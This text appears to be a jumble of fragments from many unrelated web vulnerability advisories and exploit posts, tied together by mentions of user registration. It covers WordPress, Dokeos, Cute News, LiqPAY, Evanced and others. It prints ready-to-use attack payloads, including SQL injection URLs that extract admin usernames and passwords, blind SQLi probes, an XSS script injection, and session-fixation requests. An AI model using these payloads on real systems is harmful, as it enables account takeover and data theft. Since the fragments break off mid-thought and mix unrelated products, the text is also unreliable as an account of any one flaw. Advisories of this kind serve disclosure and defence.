user registration
1. Insecure file upload in blog personal gallery
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Security risk: critical
Preconditions:
1. attacker must be registered user
2. attacker must have blog editing privileges
Registered users with blog keeping privileges can access personal gallery
functionality, example URL:
=> XSS in Role (parameter: name, module: role, url: admin/user/roles)
The 'name' parameter is not properly sanitized and XSS payload can be
set as a role name.
This will affect in administration pages as well as user registration
page if the role is set to be shown.
=> XSS in Profile (parameter: explanation, module: profile, url:
admin/user/profile)
######################## Bug Description ###########################
Description:
--------------------
A Lot Of Sql Injection Found And We Exploit One Of them
A Registered User Can Change His/Her Name And Read All Other's Private Messages.
Vulnerabilities:
--------------------
+--> Multiple SQL Injection Vulnerabilities
&comment_email=&comment_url=&user_ip=<script>alert(666)</script>
&style_dropdown=--&comment_text=This+is+an+example+comment.
&comment_capcha=571560&submit=%A0Post+Comment%A0\r\n\r\n
The sender IP address can be only seen by a registered
user. So the code sent by the attacker will be executed
when a registered user will see the comments page.
III - SESSION FIXATION
POST /index.php?checknum=432461038814&msg=App_Clicked HTTP/1.1
On this method is based possible atacks:
- mass user registration
- bruteforce atacks
- flood atacks on eyeBoard service like:
POST /index.php?checknum=PREDICTID_checksum&msg=addMsg HTTP/1.1
params=%3Capp%3EeyeBoard%3C%2Fapp%3E
Dokeos E-Learning System system has local file include vulnerability in script user_portal.php
Vulnerable GET parameter "include".
Registered user can use this vulnerability.
Code
****
#################################################
1. SQL Injection in "private.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Preconditions:
===============
a) attacker must have logged in as registered user
b) private message system must be enabled
Caused by:
===============
Parameter "disablesmilies" is not sanitized properly before being used in
SQL INJECTION (SQLi):
----------------------
######################
~~~~~~---->Unregistered user (get var --> 'letra'):
http://[HOST]/[HOME_PATH]/index.php?letra=2'+union+all+select+1,mail,3,pass+FROM+lc_usuario+WHERE+id=1/*
<------------ Got mail/pass of user id = 1 (admin) (pass no encrypted!) ------------>
"WordPress is a state-of-the-art publishing platform with a focus
on aesthetics, web standards, and usability. WordPress is both
free and priceless at the same time."
During research on MySQL Column Truncation Vulnerabilities it was
discovered that the user registration system of Wordpress is not
protected against this kind of attack. Further research then
discovered that this vulnerability can be used to reset the passwords
of users to a random string when user registration is activated
in the blog.
4) Description of Vulnerability
LiqPAY one-time-password technology is based on SMS messages sent to
mobile phone of registered user. In order to login user has to submit
his mobile phone number on web-form and will be prompted for 8-digits
password from SMS message sent by system to his mobile.
Vulnerability is that SMS messages are not tagged in any way that they
are from LiqPAY system.
#Content-Type: application/x-www-form-urlencoded
#
#resetpwemail=[valid_mail]%27+and+1%3D%270 --> FALSE
#resetpwemail=[valid_mail]%27+and+1%3D%271 --> TRUE
#
#Other P0C (with a registered user):
#
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=0%23 -->FALSE
#http://[HOST]/[PATH]/Profile.php?id=[valid_id]%27+AND+1=1%23 -->TRUE
#
#--------------
SQL Injection:
File affected: show_post.php
This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23
Now theres the Evanced Summer reader Suite.
summer re•ader
viewreviews.asp?ProgramID=35 union all select lol FROM lol--&CurrPage=2
XSS also works in the user registration page for the name, and all other info, and a nice XSS exists under user reviews for every field in patronlogadd.asp
The fun doesnt stop there. Next we have Room Rese•rve
XSS works in the room reservation area.
Requisites: magic quotes = off
File affected: submit_post.php
This bug allows a registered user to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)
http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23
############################################################################
I'm going to rest for some time...J. Enrique y Pedro...wtf!?...algo sobre ILIAS!! ^_^
<<<<---------++++++++++++++ Condition: registered user +++++++++++++++++--------->>>>
I used my own account in my university...sorry for testing :P
level accounts can also exploit a partial file disclosure vulnerability
to view all usernames.
Cute News suffers from other security failures such as:
* User registration, in register.php the password input field should be
shown as stars to prevent shoulder surfing. This is fixed in UTF-8b.
* Email addresses are exposed by the news article template. The email
address should be obsfucated to prevent spam harvesting. There is an
option in both 1.4.6 and UTF-8b versions to hide the email address.
|
